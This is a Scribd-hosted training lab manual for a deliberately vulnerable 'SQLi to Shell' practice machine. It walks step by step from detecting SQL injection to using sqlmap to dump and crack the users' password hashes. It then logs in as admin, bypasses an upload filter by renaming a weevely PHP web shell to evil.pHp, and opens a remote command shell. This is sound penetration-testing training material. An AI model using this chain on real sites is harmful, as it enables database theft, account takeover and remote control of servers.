Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
93 views

Lab Manual - SQLi To Shell - V1.0

Uploaded by

Kamalesh
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
93 views

Lab Manual - SQLi To Shell - V1.0

Uploaded by

Kamalesh
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Lab Manual

SQLi to Shell

Prerequisite: Kali Linux, SQLi to shell

Steps to follow:

Step 1. We shall start with finding out the IP address of SQLi to Shell machine.
Go to the SQLi to shell terminal, type ifconfig and press Enter. It will display the IP address as
shown in the image below.

Step 2. Go to browser, enter the IP address of SQLi to shell and press Enter. The target website will
open as shown in the image below.

Now click on the test button.

1|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 3. A new page will open in the browser with the URL 192.168.43.129/cat.php?id=1, as shown in
the image below.

Step 4. Now, put a single quote (‘) after the URL and press Enter. We should be able to see SQL syntax
error on the page. This means that the website is vulnerable to SQL injection attack.

Step 5. Now, copy the URL of this page and open a new terminal. Type sqlmap -u target_URL, as
shown in the image below, and press Enter.

2|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 6. Now, it will start scanning the target. In the image below, it can be seen that you can see it
finds out the backend database as MySQL and asks whether the user wants to skip the test for
other DBMSes or not. Type n to choose No.

Step 7. It will then ask whether to include all tests for MySQL. Type n to choose No.

Step 8. As shown in the image below, it finds out that parameter id is vulnerable, and it is now asking
whether to keep testing for others. Type n to choose No.

Step 9. Now, in order to find out the database name, type sqlmap -u target URL --dbs, as shown in
the image below, and press Enter.

Step 10. As shown in the image below, it has found 2 databases. Now, we shall try to retrieve tables
of database ‘photoblog’.

Step 11. To find out the names of tables within the database, type sqlmap -u target URL -D photoblog
--tables, as shown in the image below, and press Enter.

3|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 12. As shown in the image below, sqlmap has found 3 tables. Now we shall try to retrieve the
columns of table users.

Step 13. To retrieve the columns of users, type sqlmap -u target URL -D photoblog -T users --columns,
as shown in the image below, and press Enter.

Step 14. As shown in the image below, sqlmap has found 3 columns, viz., id, login, password. Now,
we shall dump the data of these columns.

Step 15. To dump the data of columns, type sqlmap -u target URL -D photoblog -T users -C
id,login,password --dump as shown in the image below, and press Enter.

Step 16. Sqlmap will now ask whether the user wants to save hashes in any file. Type n to choose No.

Step 17. Now, sqlmap will ask whether the user wants to crack the hashes using dictionary attack.
Type y to choose Yes.

4|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 18. Now, sqlmap will ask whether the user wants to use default dictionary or use custom
dictionary or file with list of dictionary file. Type 1 and press Enter.

Step 19. Sqlmap will now ask whether the user wants use suffixes. Type n and press Enter.

Step 20. As highlighted in the image below, sqlmap has found username and password.

Here, username is admin and password is P4ssw0rd.

Step 21. Now, go to login page of the website and login with these credentials.

5|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 22. You will be greeted with administrator page, as shown in the image below. Click on New
picture.

Step 23. A new page will now appear as shown in the image below. In this page we can upload a php
web shell. But before uploading the web shell, we would require to create a web shell.

Step 24. To create a web shell, open a new terminal, and type weevely generate password filename
as shown in the image below, and press Enter.

6|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 25. Now go to the upload page and upload this web shell.

Step 26. As shown in the image below, it says “NO PHP!!!”. This means no file with the extension
“.php” is allowed.

Let’s change the extension of the file.

Step 27. To change the name of the file, type mv filename newfilename , as shown in the image below.

Step 28. Now, go back to upload page and upload this shell.

7|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 29. As shown in the image below, web shell has been uploaded.

Step 30. Now, go to the url ip-address/admin/uploads/.

Here, we can see that the uploaded web shell is listed. Now, click on evil.pHp.

Step 31. A new blank page will open. Note the URL of this page.

8|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved
Step 32. To get the reverse connection, copy the whole URL, open a new terminal and type weevely
copied URL password as shown in the image below:

As can be seen in the image above, we have connected to the weevely shell and now we can execute
any arbitrary command remotely.

Note: There are other ways to find out the URL or path of the web sheel like burpsuite, dirb, gobuster
etc. Please practice on those as part of the exercise.

9|Page
Copyright ©Skill Cube Pvt. Ltd. All rights reserved

You might also like